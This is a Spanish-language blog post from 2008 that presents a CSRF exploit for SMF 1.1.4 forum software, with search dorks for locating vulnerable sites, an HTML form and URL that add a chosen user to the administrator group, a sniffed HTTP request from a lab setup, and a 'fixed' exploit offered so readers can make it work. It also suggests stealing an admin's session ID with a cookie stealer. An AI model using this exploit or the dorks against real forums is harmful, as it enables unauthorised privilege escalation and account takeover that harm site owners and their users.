miércoles, 30 de enero de 2008

SMF 1.1.4 - Add User In Group [CSRF]

Bueno en primera este post lo saque de remoteexecution.es el link es este:

http://www.remoteexecution.es/foro/index.php?topic=879

Dork: "SMF 1.1.4"
Dork (SID): inurl:index.php inurl:sid= "SMF 1.1.4"


< h t m l >
< h e a d >
< b o d y >
< action="http://adress.com/path/index.php?action=membergroups;sa=members;group=GroupID" method="post" type="text" name="toAdd" id="toAdd" size="30">
< type="submit" name="add" value="Add Members">
< type="hidden" name="sc" value="ADMIN SESSION ID">
< /form>
< /body>
< /html>

o si no tambien se puede usar

forum/path/index.php?action=membergroups;sa=members;group=groupid;toAdd=usertoadd&add=Add+Members&sc=sid
by Syntacks!

Todo lo que usted necesita es administrador identificación de la sesión (SID), intentan engañar a los admin (utilizando cookie stealer etc ..)

|| *************** ||
|| Author: phAnt0mh4ck3r ||
|| ************************* ||
|| SMF 1.1.4 - Add User In Group [CSRF] ||
|| ________________________________________________________________ ||
|_________________________________________________________________________


ahora lo pongo por la explicacion de aqui abajo :-P

Bueno platicando con Em3Trix me dijo que no le funcionaba y demas entonces cheke el code que ponen aqui lo revise un poco y vi que no daba por que no ponia nada de usuario, generalmente saben que lo hace para evitar un copy paste (o scriptkiddies :-P) :P entonces bueno dije veamos que pasa y que falta puse mi backtrack, y dos maquinas en lindows una de ellas en vmware, me conecte a mi red local y en una tenia montado smf, en la otra de lindows era donde hiba a hacer los cambios y en la de backtrack es donde iba a snnifear que es como se sacan los CSRF (snnifeando) :P ok puse mi ettercap en accion xD y el resultado fue esto:


POST /smf/index.php?action=profile2 HTTP/1.1.
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*.
Referer: http://192.168.1.64/smf/index.php?action=profile;u=2;sa=account.
Accept-Language: es.
Content-Type: application/x-www-form-urlencoded.
Accept-Encoding: gzip, deflate.
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1).
Host: 192.168.1.64.
Content-Length: 260.
Connection: Keep-Alive.
Cache-Control: no-cache.
Cookie: PHPSESSID=0585e394dfabf69c18a586d91b93ae84; SMFCookie956=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A40%3A%22596fe11e6a4ac2039e5d80c345060d6c5b1dcbd8%22%3Bi%3A2%3Bi%3A1390709326%3Bi%3A3%3Bi%3A0%3B%7D.
.
realName=prueba&dateRegistered=2007-12-27&posts=0&ID_GROUP=1&additionalGroups%5B%5D=0&emailAddress=prueba@prueba.com&hideEmail=0&showOnline=0&showOnline=1&passwrd1=&passwrd2=&secretQuestion=&secretAnswer=&sc=7480880c30be3b8e5b1dc32a3755150f&userID=2&sa=accountHTTP/1.1 302 Found.
Date: Mon, 28 Jan 2008 04:09:50 GMT.
Server: Apache/2.2.4 (Win32) PHP/5.2.3.
X-Powered-By: PHP/5.2.3.
Expires: Thu, 19 Nov 1981 08:52:00 GMT.
Cache-Control: private.
Pragma: no-cache.
Location: http://192.168.1.64/smf/index.php?action=profile;u=2;sa=account.
Content-Encoding: gzip.
Vary: Accept-Encoding.
Content-Length: 26.
Keep-Alive: timeout=5, max=100.
Connection: Keep-Alive.
Content-Type: text/html.


no pongo todo el resultaod si no solo lo mas importante :-P

en la parte de:

realName=prueba&dateRegistered=2007-12-27&posts=0&ID_GROUP=1&additionalGroups%5B%5D=0&emailAddress=prueba@prueba.com&hideEmail=0&showOnline=0&showOnline=1&passwrd1=&passwrd2=&secretQuestion=&secretAnswer=&sc=7480880c30be3b8e5b1dc32a3755150f&userID=2&sa=accountHTTP/1.1

ahi se ve lo primero quees realName entonces ya le dije a Em3Trix que esa era la unica parte que faltaba y la agregara en el code y quedaria asi:

(se agrego esa parte por que es el identificador de usuario, tal vez tambine se pueda con el id de registro del user :-) )

< h t m l >
< h e a d >
< b o d y >
< action="http://localhost/foro/index.php?action=membergroups;sa=members;group=1;realName=Em3Trix" method="post" type="text" name="toAdd" id="toAdd" size="30">
< type="submit" name="add" value="Add Members">
< type="hidden" name="sc" value="ADMIN SESSION ID">
< /form>
< /body>
< /html>


donde realName sera el nombre del usuario que quieren elevar los privilegios y el group=1 es el grupo de administradores

entonces ahi tienen para que les funcione bien y sin problemas :-)

Saludos

Komtec1

4 comentarios:

Anónimo dijo...
Este comentario ha sido eliminado por un administrador del blog.
Anónimo dijo...
Este comentario ha sido eliminado por un administrador del blog.
Anónimo dijo...
Este comentario ha sido eliminado por un administrador del blog.
Anónimo dijo...
Este comentario ha sido eliminado por un administrador del blog.